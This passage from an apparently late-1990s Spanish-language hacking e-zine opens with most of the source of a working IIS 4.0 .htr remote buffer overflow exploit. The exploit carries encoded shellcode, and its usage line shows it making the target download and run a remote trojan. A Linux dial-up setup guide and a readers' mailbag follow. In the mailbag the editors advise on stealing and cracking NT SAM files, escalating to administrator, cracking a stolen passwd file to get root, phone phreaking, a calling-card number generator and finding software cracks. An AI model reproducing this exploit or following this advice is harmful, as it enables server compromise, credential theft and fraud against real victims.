 db 041h, 041h, 041h, 041h, 041h, 041h, 0b0h, 087h, 067h, 068h, 0b0h, 087h
 db 067h, 068h, 090h, 090h, 090h, 090h, 058h, 058h, 090h, 033h, 0c0h, 050h
 db 05bh, 053h, 059h, 08bh, 0deh, 066h, 0b8h, 021h, 002h, 003h, 0d8h, 032h
 db 0c0h, 0d7h, 02ch, 021h, 088h, 003h, 04bh, 03ch, 0deh, 075h, 0f4h, 043h
 db 043h, 0bah, 0d0h, 010h, 067h, 068h, 052h, 051h, 053h, 0ffh, 012h, 08bh
 db 0f0h, 08bh, 0f9h, 0fch, 059h, 0b1h, 006h, 090h, 05ah, 043h, 032h, 0c0h
 db 0d7h, 050h, 058h, 084h, 0c0h, 050h, 058h, 075h, 0f4h, 043h, 052h, 051h
 db 053h, 056h, 0b2h, 054h, 0ffh, 012h, 0abh, 059h, 05ah, 0e2h, 0e6h, 043h
 db 032h, 0c0h, 0d7h, 050h, 058h, 084h, 0c0h, 050h, 058h, 075h, 0f4h, 043h
 db 052h, 053h, 0ffh, 012h, 08bh, 0f0h, 05ah, 033h, 0c9h, 050h, 058h, 0b1h
 db 005h, 043h, 032h, 0c0h, 0d7h, 050h, 058h, 084h, 0c0h, 050h, 058h, 075h
 db 0f4h, 043h, 052h, 051h, 053h, 056h, 0b2h, 054h, 0ffh, 012h, 0abh, 059h
 db 05ah, 0e2h, 0e6h, 033h, 0c0h, 050h, 040h, 050h, 040h, 050h, 0ffh, 057h
 db 0f4h, 089h, 047h, 0cch, 033h, 0c0h, 050h, 050h, 0b0h, 002h, 066h, 0abh
 db 058h, 0b4h, 050h, 066h, 0abh, 058h, 0abh, 0abh, 0abh, 0b1h, 021h, 090h
 db 066h, 083h, 0c3h, 016h, 08bh, 0f3h, 043h, 032h, 0c0h, 0d7h, 03ah, 0c8h
 db 075h, 0f8h, 032h, 0c0h, 088h, 003h, 056h, 0ffh, 057h, 0ech, 090h, 066h
 db 083h, 0efh, 010h, 092h, 08bh, 052h, 00ch, 08bh, 012h, 08bh, 012h, 092h
 db 08bh, 0d7h, 089h, 042h, 004h, 052h, 06ah, 010h, 052h, 0ffh, 077h, 0cch
 db 0ffh, 057h, 0f8h, 05ah, 066h, 083h, 0eeh, 008h, 056h, 043h, 08bh, 0f3h
 db 0fch, 0ach, 084h, 0c0h, 075h, 0fbh, 041h, 04eh, 0c7h, 006h, 08dh, 08ah
 db 08dh, 08ah, 081h, 036h, 080h, 080h, 080h, 080h, 033h, 0c0h, 050h, 050h
 db 06ah, 048h, 053h, 0ffh, 077h, 0cch, 0ffh, 057h, 0f0h, 058h, 05bh, 08bh
 db 0d0h, 066h, 0b8h, 0ffh, 00fh, 050h, 052h, 050h, 052h, 0ffh, 057h, 0e8h
 db 08bh, 0f0h, 058h, 090h, 090h, 090h, 090h, 050h, 053h, 0ffh, 057h, 0d4h
 db 08bh, 0e8h, 033h, 0c0h, 05ah, 052h, 050h, 052h, 056h, 0ffh, 077h, 0cch
 db 0ffh, 057h, 0ech, 080h, 0fch, 0ffh, 074h, 00fh, 050h, 056h, 055h, 0ffh
 db 057h, 0d8h, 080h, 0fch, 0ffh, 074h, 004h, 085h, 0c0h, 075h, 0dfh, 055h
 db 0ffh, 057h, 0dch, 033h, 0c0h, 040h, 050h, 053h, 0ffh, 057h, 0e4h, 090h
 db 090h, 090h, 090h, 0ffh, 06ch, 066h, 073h, 06fh, 066h, 06dh, 054h, 053h
 db 021h, 080h, 08dh, 084h, 093h, 086h, 082h, 095h, 021h, 080h, 08dh, 098h
 db 093h, 08ah, 095h, 086h, 021h, 080h, 08dh, 084h, 08dh, 090h, 094h, 086h
 db 021h, 080h, 08dh, 090h, 091h, 086h, 08fh, 021h, 078h, 08ah, 08fh, 066h
 db 099h, 086h, 084h, 021h, 068h, 08dh, 090h, 083h, 082h, 08dh, 062h, 08dh
 db 08dh, 090h, 084h, 021h, 078h, 074h, 070h, 064h, 06ch, 054h, 053h, 021h
 db 093h, 086h, 084h, 097h, 021h, 094h, 086h, 08fh, 085h, 021h, 094h, 090h
 db 084h, 08ch, 086h, 095h, 021h, 084h, 090h, 08fh, 08fh, 086h, 084h, 095h
 db 021h, 088h, 086h, 095h, 089h, 090h, 094h, 095h, 083h, 09ah, 08fh, 082h
 db 08eh, 086h, 021h, 090h, 098h, 08fh, 04fh, 086h, 099h, 086h, 021h
 _url2 db 85 dup (021h)
 db ".htr HTTP/1.0"
 db 00dh,00ah, 00dh, 00ah  

logo  db "------(IIS 4.0 remote buffer overflow exploit)---------------------------------", 13, 10
			db "(c) dark spyrit -- 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 .",13,10
			db "http://www.eEye.com",13,10,13,10
			db "[usage: iishack   ]", 13, 10
			db "eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe",13,10
			db "do not include 'http://' before hosts!",13,10
			db "-------------------------------------------------------------------------------", 13, 10, 0
logolen equ $-logo

u_length db 10,"No more than 70 chars in 2nd url.",13,10,0
u_lengthl equ $-u_length

errorinit db 10,"Error initializing winsock.", 13, 10, 0
errorinitl equ $-errorinit

nohost db 10,"No host or IP specified.", 13,10,0
nohostl equ $-nohost

noport db 10,"No port specified.",13,10,0
noportl equ $-noport

no_url db 10,"No URL specified.",13,10,0
no_urll equ $-no_url

urlinv db 10,"Invalid URL.. no file specified?",13,10,0
urlinvl equ $-urlinv

reshost db 10,"Error resolving host.",13,10,0
reshostl equ $-reshost

sockerr db 10,"Error creating socket.",13,10,0
sockerrl equ $-sockerr

ipill   db 10,"IP error.",13,10,0
ipilll   equ $-ipill

porterr db 10,"Invalid port.",13,10,0
porterrl equ $-porterr

cnerror db 10,"Error establishing connection.",13,10,0
cnerrorl equ $-cnerror

success db 10,"Data sent!",13,10,0
successl equ $-success

console_in      dd      ?
console_out     dd      ?
bytes_read      dd      ?

wsadescription_len equ 256
wsasys_status_len equ 128

WSAdata struct
wVersion dw ?
wHighVersion dw ?
szDescription db wsadescription_len+1 dup (?)
szSystemStatus db wsasys_status_len+1 dup (?)
iMaxSockets dw ?
iMaxUdpDg dw ?
lpVendorInfo dw ?
WSAdata ends

sockaddr_in struct
sin_family dw ?
sin_port dw ?
sin_addr dd ?
sin_zero db 8 dup (0)
sockaddr_in ends

wsadata WSAdata 
sin sockaddr_in 
sock dd ?
numbase dd 10
_port db 256 dup (?)
_host db 256 dup (?)
_url db 256 dup (?)
stuff db 042h, 068h, 066h, 075h, 041h, 050h

.code
start:

				call    init_console
				push    logolen
				push    offset logo
				call    write_console

				call    GetCommandLineA
				mov     edi, eax
				mov     ecx, -1
				xor     al, al
				push    edi
				repnz   scasb
				not     ecx
				pop     edi
				mov     al, 20h
				repnz   scasb
				dec     ecx
				cmp     ch, 0ffh
				jz      @@0
				test    ecx, ecx
				jnz     @@1
@@0:        
				push    nohostl
				push    offset nohost
				call    write_console
				jmp     quit3
@@1:
				mov     esi, edi
				lea     edi, _host
				call    parse
				or      ecx, ecx
				jnz     @@2
				push    noportl
				push    offset noport
				call    write_console
				jmp     quit3
@@2:
				lea     edi, _port
				call    parse
				or      ecx, ecx
				jnz     @@3
				push    no_urll
				push    offset no_url
				call    write_console
				jmp     quit3

@@3:
				push    ecx
				lea     edi, _url
				call    parse
				pop     ecx
				cmp     ecx, 71
				jb      length_ok
				push    u_lengthl
				push    offset u_length
				call    write_console
				jmp     quit3

length_ok:
				
				mov     esi, offset _url
				mov     edi, offset _url2
@@10:
				xor     al, al
				lodsb
				cmp     al, 02fh
				jz      whaq
				test    al, al
				jz      @@20
				add     al, 021h
				stosb
				jmp     @@10
@@20:
				push    urlinvl
				push    offset urlinv
				call    write_console
				jmp     quit3
				

whaq:
				push    esi
				lea     esi, stuff
				lodsw
				stosw
				lodsd
				stosd
				pop     esi
fileget:        
				xor     al, al
				lodsb
				test    al, al
				jz      getdone
				add     al, 021h
				stosb
				jmp     fileget
getdone:

				push    offset wsadata
				push    0101h
				call    WSAStartup
				or      eax, eax
				jz      winsock_found

				push    errorinitl
				push    offset errorinit
				call    write_console
				jmp     quit3

winsock_found:
				xor     eax, eax
				push    eax
				inc     eax
				push    eax
				inc     eax
				push    eax
				call    socket
				cmp     eax, -1
				jnz     socket_ok

				push    sockerrl
				push    offset sockerr
				call    write_console
				jmp     quit2

socket_ok:
				mov     sock, eax
				mov     sin.sin_family, 2
				mov     esi, offset _port
lewp1:
				xor     al, al
				lodsb
				test    al, al
				jz      go
				cmp     al, 039h
				ja      port_error
				cmp     al, 030h
				jb      port_error
				jmp     lewp1

port_error:
				push    porterrl
				push    offset porterr
				call    write_console
				jmp     quit1

go:

				mov     ebx, offset _port
				call    str2num
				mov     eax, edx
				push    eax
				call    htons
				mov     sin.sin_port, ax

				mov     esi, offset _host
lewp:
				xor     al, al
				lodsb
				cmp     al, 039h
				ja      gethost
				test    al, al
				jnz     lewp
				push    offset _host
				call    inet_addr
				cmp     eax, -1
				jnz     ip_aight
				push    ipilll
				push    offset ipill
				call    write_console
				jmp     quit1

ip_aight:
				mov     sin.sin_addr, eax
				jmp     continue

gethost:
				push    offset _host
				call    gethostbyname
				test    eax, eax
				jnz     gothost

				push    reshostl
				push    offset reshost
				call    write_console
				jmp     quit1

gothost:
				mov     eax, [eax+0ch]
				mov     eax, [eax]
				mov     eax, [eax]
				mov     sin.sin_addr, eax

continue:
				push    size sin
				push    offset sin
				push    sock
				call    connect
				or      eax, eax
				jz      connect_ok
				push    cnerrorl
				push    offset cnerror
				call    write_console
				jmp     quit1

connect_ok:

				xor     eax, eax
				push    eax
				push    sploit_length
				push    offset sploit
				push    sock
				call    send
				push    successl
				push    offset success
				call    write_console

quit1:
				push    sock
				call    closesocket
quit2:
				call    WSACleanup
quit3:
				push    0
				call    ExitProcess
parse   proc
;cheap parsing.. hell.. its only an exploit.

lewp9:
				xor     eax, eax
				cld
				lodsb
				cmp     al, 20h
				jz      done
				test    al, al
				jz      done2
				stosb
				dec     ecx
				jmp     lewp9
done:
				dec     ecx
done2:
				ret
endp

str2num proc
				push    eax ecx edi
				xor     eax, eax
				xor     ecx, ecx
				xor     edx, edx
				xor     edi, edi
lewp2:
				xor     al, al
				xlat
				test    al, al
				jz      end_it
				sub     al, 030h
				mov     cl, al
				mov     eax, edx
				mul     numbase
				add     eax, ecx
				mov     edx, eax
				inc     ebx
				inc     edi
				cmp     edi, 0ah
				jnz     lewp2

end_it:
				pop     edi ecx eax
				ret
endp

init_console  proc
				push    -10
				call    GetStdHandle
				or      eax, eax
				je      init_error
				mov     [console_in], eax
				push    -11
				call    GetStdHandle
				or      eax, eax
				je      init_error
				mov     [console_out], eax
				ret
init_error:
				push    0
				call    ExitProcess
endp

write_console proc    text_out:dword, text_len:dword
				pusha
				push    0
				push    offset bytes_read 
				push    text_len          
				push    text_out          
				push    console_out       
				call    WriteConsoleA
				popa
				ret
endp

end     start

*********************Fin del codigo*****************************************


En el proximo articulo hablare de como asegurar un sistema NT paso a paso.

Bueno  espero  que les haya gustado este articulo y que lo usen para bien !!!
Recuerden la diferencia entre HACKING y CRACKING !!! OK

Bibliografia

Guia del superhacher ... By Nobody
Hacking NT V1.0......... By Chessy
Hackers Proof .......... By ... no me acuerdo XDDD
Undocumented Windows NT..By OïReilly & Associates
IISHACK
Eeye Security Team       www.eeye.com
Secholed y Otros
Anticode                 www.anticode.com


Comentarios, sugerencias, ideas, colaboraciones


 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

Malas ondas a > /dev/null

PlaXiuS

CDLR
Pro Hackers Domain


"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*


18. ____________________________________ Como Conectarse Con Linux a Internet
                                         By CrackX
		
Holas como estan en este texto tratare de explicar como conectarnos con LINUX 
a internet.

Para  poder  configurar  la  conexion  a  internet desde LINUX debes tener un 
KERNEL con soporte PPP y el numero de tu isp y dns :)

Bueno  nos vamos al directorio /etc y hay editamos el archivo resolv.conf ahi 
debes poner las dns de tu isp se veria algo haci. (todo esto lo hare creyendo 
que tienes como isp CTC)

domain ctcreuna.cl      <--- aqui  deves poner tu verdadero isp ejemplo si es 
                             entel debes poner entelchile.net
nameserver 206.34.141.1 <--- aqui lo mismo que arriba
nameserver 206.34.141.2 

Ahora  debemos  configurar  el  fichero  correspondiente  a  tu isp te vas al  
directorio  /etc/ppp  y  ahi creamos el fichero  CTC  que tiene que llevar lo 
siguiente:

#!/bin/sh
/usr/sbin/chat -v "" atdt6006004444 <--- aqui  ponemos  el  numero  de tu isp
CONNECT ""

Al fichero ctc debes darle permisos de ejecucion  osea seria chmod 755 ctc

bueno ahora en el mismo directorio editamos el fichero options:
/etc/ppp/options y debes ponerle la siguente linea

connect /etc/ppp/ctc <--- aqui donde puse ctc me refiero al fichero que hemos
                          creado antes
crtscts
modem
passive
noipdefault
debug
defaultroute
asyncmap a0000
/dev/ttyS2   <-- en ttyS2 debes poner el puerto donde tengas el modem ejemplo 
                 si lo tienes en el com 1 seria ttyS0
                 si lo tienes en el 2 ttyS1 y asi sucesivamente
115200       <---aqui debes poner la velocidad de tu modem
user crackx  <---aqui pones tu login de usario
remotename ctcreuna.cl <--- aqui debes ponerl el domonio de tu isp

bueno ahora solo nos queda configurar el fichero pap-secrets
/etc/ppp/pap-secrets  en  este  fichero  ponemos  nuestro  login y passwd que 
usamos para conectarnos a internet, nos quedaria algo asi:

login   *  passwd

los espacios entre el login y el passwd debes separarlos con un tab.

Bueno  ya  estamos  listos para conectarnos a internet desde linux solo debes
escribir el comando pppd y tu modem empezara  a marcar si quieres ver todo lo 
que esta pasando en ese momento debes escribir lo siguente:
tail -f /var/log/messages 
y  veras  como  conectas a internet, aqui dejo un log de lo que sucede en ese 
momento:

May 16 22:23:34 localhost pppd[2293]: pppd 2.3.5 started by root, uid 0
May 16 22:23:36 localhost chat[2295]: send (atdt6006004444^M)
May 16 22:23:36 localhost chat[2295]: expect (CONNECT)
May 16 22:23:59 localhost chat[2295]: atdt6006004444^M^M
May 16 22:23:59 localhost chat[2295]: CONNECT
May 16 22:23:59 localhost chat[2295]:  -- got it 
May 16 22:23:59 localhost chat[2295]: send (^M)
May 16 22:23:59 localhost pppd[2293]: Serial connection established.
May 16 22:24:00 localhost pppd[2293]: Using interface ppp0
May 16 22:24:00 localhost pppd[2293]: Connect: ppp0 <--> /dev/ttyS2
May 16 22:24:00 localhost pppd[2293]: Remote message: 
May 16 22:24:01 localhost pppd[2293]: local  IP address 200.28.224.155
May 16 22:24:01 localhost pppd[2293]: remote IP address 172.16.1.1

je  despues  de  ver  esto  estaras  conectado a internet, bueno eso es todo, 
espero que les haya servido de algo dudas,consultas,insultos a:


 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 .


"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*

19. _________________________________________________________ Ha llegado Mail
                                                              By CDLR

Subject: una preguntitars
Date: Sun, 30 May 1999 23:11:34 PDT
From: "Juan Pablo" <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
To: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

holap...

Me llamo juan pablo... y hace poco encontre su pagina de E-ZINE.. de a
poco me estoyt metiendo en esto de hackear y eso... pero apenas cacho pero
la P... asi que de a poco voy a vanzando.

Una pregunta puntual:
mmm.... Encontre un doc de un tipo en chile creo que de nick MOONSPELL...
que decia que la black box le funciono..
Hice la caja pero no me pude conseguir la resistencia de 1,8 Kh... asi que
le puse una de 1,5 Kh...
Le escribi a un tipo de chile que esta en la misma onda... recien
empezando, y le pregunte si funcionaba.
Me dijo que donde el estaba (antofagasta) no le funciono por que le
detectaban la black box... o algo asi.
Mi pregunta es;:
FUNCIONA O NOP??? ya que con 1,5 creo que no funciono.,.. pero quiero probar
con la de 1,8, o sino corto el webeo.
Por fa diganme si funciona o si hay alguna otra box pa ahorrar $$$ pa la
cuenta por que me sale re caro mensualmente.

         [TkR: la respuesta es SI, si le funciono, lo que pasa es que como ya
         debes saber hay centrales digitales y analogas, he ahi la diferencia
         de todas formas tratare de tenerte respuesta para el proximo numero]
		
Tb expliquenme por fa como se usa la blue box ya que tengo un programa
que emite los siniidos de las teclas, + otras 4 o 5 creo que dice que es pa
la blue box,,, pero no cacho una.
Por fa les agradeceria si me contestaran pronto lo de la black box. Soy de
la RM.

         [Tkr: En  teoria  la  Blue Box funciona asi: te conectas a un numero
         gratuito, mandas el tono 2600 (de colgar la linea), la central corta
         la comunicacion, pero como  sigues  conectado puedes marcar pulsando
         los tonos desde tu pc. o eso es lo que yo he oido]

Ah... otra cosa: si ustedes son de por aca =... podria verlos pa que por
fa me hagan llegar el linux. t4engo un amigo que tiene SUSE... pero varios
me dicen que altiro con Red Hat.

         [Tkr: PlaXius, apunta otro para el MKLINUX...]
         [PLX: te  maileo  y  nos ponemos de acuerdo pues ya empezamos con el
         MKLINUX TEAM y pronto  publicaremos los distribuidores oficiales del
         CD que en un principio  sera  el  REDHAT 6.0 por ser el mas facil de 
         instalalar]

Si pueden hacerme la paletea de devolverme pronto el mail... ya que he
estado leyendo como loco en este mes sobre hacking... por que me interesa
caleta el tema.
Sabnia lo minimo.. que pa todos mis compañeros era la caga... como
autoexec.bat jajaja o comandos de DOS... ajaja
	(QUE PARA MI ERAN UN GRAN LOGRO PERO ME DOY CUENTA QUE AHOIRA HAY UNA
BARRA MUCHO MAS ALTA Y QUIERO ALCANZARLA)
	Ah... y si pueden conseguirme C y un manual pa python y esas cosas...

         [Tkr: lo de los manuales, eso si los puedes conseguir en la red,
         has oido hablar de Altavista..???]

Tengo una CDR y podria ayudarles grabandoles CD...:)
	Ok... ojala me devuelvan pronto esto y en buena onda... no con "ANDATE A
LA CHUCHA PENDEJO WEON".. ahora que estoy en periodo de letargo por preu ya
que sali el año pasado y no me dio pa ing civil en la U, terngo + tiempo
libre pa aprender de estas cosas... claro que = me llega el TULASO de mi
papa cuando llegua la cuenta...  por fa ayudenme con eso .
chau... gracias anticipadamente.

         [Tkr: Lo dicho, servis para el MKLINUXTEAM, podes mandarle tus datos a
         PlaXiuS, y una cosa...cuando hemos respondido Andate a la chucha weon..?
         creo que nunca, bueno a veces estoy en dias dificiles y doy unas
         respuestas algo sarcasticas, pero nada mas. ;)]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: ayudenme...
Date: Tue, 01 Jun 1999 22:13:33 PDT
From: "Eduardo Herrera" <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
To: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

Hola gente de proyecto r, antes que todo debo felicitarlos por su página, 
ayuda mucho, es interesante y tiene unos links espectaculares. Lo primero 
que debo decirles es que yo no soy hacker ni nada por el estilo (aunque me 
gustaria) y este mail va principalmente dirigido  porque necesito que me 
ayuden con el programa "AT&T CALLING CARD NUMBER GENERATOR" ya que quiero 
aprender a ocuparlo por falta de $$$...Ojalá me ayuden y me respondan, les 
estaría muy agradecido...
                                                             Gracias....

         [TkR: No conozco el programa, pero si lo tenes, creo que la mejor
         manera de aprender algo es utilizandolo, "La practica hace al
         maestro", ademas sabias que eso es ilegal...???? XDDD]
         [PLX: Este programita genera numeros de tarjetas de credito y creo
         que en algun momento funcionaban algunos numeros para generar
         numeros de tarjetas de entel ... pero como ya dijo TAkER eso es
         ilegal .. pero no por eso aprender a utilizar el software, la verdad
         jamas lo he utilizado pero no debe ser tan dificil.. a ver si tengo
         time y lo pruebo]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: hola chikos de la R.... !!!!
	 Date: Wed, 02 Jun 1999 08:49:42 PDT
	 From: "Mauricio S." <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
		 To: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 


hola chikos de la R ... parto este mail felicitandolos por el fantástiko 
proyecto ke llevan a cabo ... kreo ke el e-zine es excelente ... hacía falta 
ke en Latinoamerica... y particularmente en Chile se iniciara una cultura de 
este tipo..... tengo las 5 ediciones y las he leido y re-leido y me ha 
servido de mucho , he ido conociendo kosas ke no pensé ke existían dentro de 
internet ,pues como ustedes saben y no sé si comparten mi opinión ... en 
Chile , a la Internet se le considera solo como elemento de diversión y 
entretención ... (ciertamente en un porcentaje lo es por supuesto) y no se 
le toma el peso komo una herramienta de trabajo y un elemento ke en los 
próximos años ..va a ser cotidiano.... bueno ...mi consulta es acerca del 
spoofing de dominios (o de ip..en realidad no lo tengo muy klaro ,perdonen 
mi ignorancia) ...  es ke en innumerables veces he visto en IRC ...  en 
algunos de los nicks...  ke sus dominios no son los mas comunes (llamese : 

 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
  y blabla bla..)
y aparecen por ejemplo los dominios..    
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
   ....como 
pueden hacer eso? ... existe un programa en especial para realizar eso?...  
la otra consulta ke tenía... es sobre las cuentas shell.... para ke 
sirven?.... existe alguna dirección en internet donde obtener una gratis?... 
esperando ke mis consultas no los haya molestado ... se despide un fiel 
seguidor del Proyecto_R ...  (espero con ansias el numero 6!)...
ZeNyZero

         [Tkr: Primero que todo, gracias por las alabanzas, y si tenes razon,
         aun la gente no se ha dado cuenta del gran potencial que esta
         escondido en internet, pero creo que pronto se daran cuenta.
         Sobre lo del spoofing en IRC, esto lo hacen por medio de un
         programa, en este momento no me acuerdo cual es, lo que hace es
         configurar tu entrada al IRC por medio de un Proxy, lo malo de esto,
         es que hace la conexion mas lenta de lo normal. O podes hacerlo a
         mano, en este numero sale un articulo especificamente explicando
         paso a paso como se hace.
         Las cuentas Shell, explicadas a lo tonto, son algo asi como tener un
         Linux en tu pc, pero utilizando el telnet del Windows, digo del
         Windows porque si ya tienes Linux, pues ya tenes cuenta Shell, para
         conseguirla trata haciendole un Telnet a grex.cyberspace.org, sigue
         las instrucciones y cuando tremines ya tienes tu cuenta shell.
         ademas cyberspace no es el unico que da cuentas shell gratis, hay
         varios mas, busca en la web, ya veras todo lo que encuentras.
         El numero 6, creo que ya debes haberlo leido, y el 7, ya lo estas
         leyendo.
         Ok, todo por ahora, chau...]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: Phreacking
	 Date: Thu, 3 Jun 1999 03:52:06 -0400
	 From: "Gohan" <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
		 To: <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
		CC:  <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >


Hola: 
 
Primero me gustaria felicitarlos por la exelente pagina k han construido.
A mi me gustaria k me pasaran informacion sobre phreacking en chile, si es
k pueden. He estado buscando informacion sobre este tema pero solo encuentro
para otros paises y no pa Chile. Tambien me gustaria saber k tengo k aprender
para meterme en este mundo de underground.
Les agradesco de antemano

         [Tkr: Creo que tienes que ser mas explicito en cuento a tu pregunta,
         de todas formas informacion sobre phreak la puedes encontrar en la 
         e-zine, si tienes algunas pregunta concreta sobre el tema, debes 
         escribir a la seccion Nykkro responde. ;) ]

         [PLX: Hola goham gracias por las felicitaciones .. sobre phreack, te
         recomiendo que visites la pagina del Dr.MoonSpell
         http://pagina.de/moons ahi talvez encuentres algo interesante, Ahh
         si no me equivoco nos hemos visto jugando quake 2 XDDD.-]
         
Gohan , el gerrero legendario.......

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: saludos y algunas dudas!
	 Date: Thu, 03 Jun 1999 13:38:49 PDT
	 From: Daniel Mannheim <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
		 To: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 


Saludos al glorioso team que compuso el primer magazine electronico 
chileno.-
Puedo decir que ya lei las 100 pags. de su revista y me gusto mucho,
ademas quisiera hacer una pregunta con respecto a la seguridad NT.- tengo 
acceso fisico al sistema nt y tambien acceso a las copias de SAm.- pero no 
puedo copiarlas a un disco.- que debo hacer?
hay alguna otra forma aparte de hacer un disco de inicio?
que pasa si ejecuto el 10pht crack en el sistema?
ademas todavia no he podido dar con este programa, ya que en su page el link 
esta roto, tal como haq sucedido en la mayoria de los sitios que he 
intendado.-

    [Tkr: A ver, para poder copiar los archivos SAM es necesario iniciar 
    el NT desde un disquette, puesto que cuando esta corriendo el server
    utiliza este archivo para la validacion de los usuarios, asi que de 
    otro modo no lo podes conseguir. Si ejecutas el L0pht Crack en el sistema
    igual no te va a funcionar, ya que el archivo se encuentra en uso. Lo 
    que podes hacer es crear un disquette Repair, y ya que en este se copian
    los archivos SAM comprimidos, pues los descomprimis utilizando el mismo 
    l0phtcrack, espero que te funcione.]
    [PLX: Sobre la sam, tambien puedes sacar una copia (no siempre actulizada
    ) en el directiro winnt\repair\sam._ , copias el archivo y despues le
    haces un c:\expand sam._ sam , y listo .. usas el l0pht para crackear
    la sam. Lo otro que puedes hacer es correr el sniffer para smb que 
    trae incorporado el L0phtCrack, solo tienes que estar en el mismo 
    segmento es super util y practico. Si tienes acceso fisico ademas
    podrias correr un getadmin o sechole, o beadmin si es WINNT en espa¤ol
    para subir tu cuenta al grupo de administradores XDD. Los exploit los
    puedes bajar en www.anticode.com y pronto los tendremos en nuestra web]

Tengo otra duda, he buscado sin exito algun programa para crackear los
passwords de los archivos comprimidos del winrar (los self-extractive 
.exe).- conocen alguno??.-

    [Tkr: Nop... :(, talvez PlaXiuS... ]
    [PLX: Ni idea  ]

a.. y una pregunta mas, despues  de armar mi pc. le puse una tarjeta de 
sonido sound blaster awe64. pero suena pesimo, es como si tuviera 
interferencia de algun tipo, porque con solo conectar los audifonos o lo que 
sea ., ya se eschuca una "shshshshshshshs" asesino.
no se me ocurre que hacer.

    [Tkr: Configuraste bien los drivers...???]
    [PLX: mmm que raro .. paso, podria ser la alimentacion de los 
    parlantes pero me dices que con audifonos ocurre lo mismo!!!]

bueno, esto fue todo, si alguien me puede ayudar con mis dudas. se lo 
agradeceria mucho, repito que me encanto la primera edicion de su e-zine, 
ojala que la proxma salga pronto.-

 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: 
	 Date: Sat, 12 Jun 1999 02:23:36 GMT
	 From: Apolo Titanit <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
		 To: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 


Hola feliz aniversario,
los felicito por su E_ZinE, creo que es un gran esfuerzo de parte de 
ustedes, por tu tiempo de investigación, horas por el ciber espacio.

Yo soy estudianter de informatica y con ustedes he aprendido mucho nunca he 
metida la pata gracias a su advertencia de la cana.

Me gustaria pedirles dos favores.
1) Cuando se cambien de URL me avisen por Mail para no perder contacto.

    [Tkr: Bueno, busca www.cdlr.org ;) ]

2) Hace 3 2 mese que busco las crack o serie de los siguientes programas: 
602Pro Internet Server (PROXY), 123RemoteExpert (COMUNICACION)
Podrian ustedes decirme donde puedo buscar yo e buscado en astalavista y 
otras de menor importancia sin resultados positivos.

    [Tkr: ¨?]
    [PLX: Revisa en http://www.webhost.cl/~cucumber  haber si tienes 
    suerte]

FUERZA Y SIGAN CON SU PROYECTO_R QUE ES MUY BUENO Y NO TENEMOS NADA QUE 
ENVIDIAR A LOS LLANQUIS.

CREO QUE SU PROYECTO ES INTERESANTE Y DE BUEN NIVEL.

ADIOS.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: Adelante¡¡, Proyecto R
	 Date: Sun, 13 Jun 1999 19:19:00 -0500
	 From: INET <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
		 To: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 


Entonces que muchachos Bien ó Que ??

Les escribo desde colombia, pues por aca me han llegado dos de sus
primeras publicaciones por e-mail, y particularmente me parece que para
comenzar lo estan haciendo muy bien ¡¡¡  :-) :-) :-)

Me pueden llamar Pipa, pues asi me conocen mis allegados vacanes ¡¡¡

Me interesa mucho las publicaciones que han hecho sobre hackers, crakers
y demases y les tengo una noticia. pues que por aqui me baje un archivo
passwd, donde aparecen todos los usuarios del sistema operativo y al parecer
sus contraseñas, pero estan cifradas, ademas aparecen otras descripciones de
los usuarios.

Sera que ustedes podrian ser tan amigables, amables de indicarme como
decifro esos passwords para poder ingresar al Sistema como root.

    [Tkr: Utiliza el John the ripper y unos cuantos buenos diccionarios 
    de palabras, asi si el admin tiene un passwd debil talvez lo consigas 
    facilmente...]

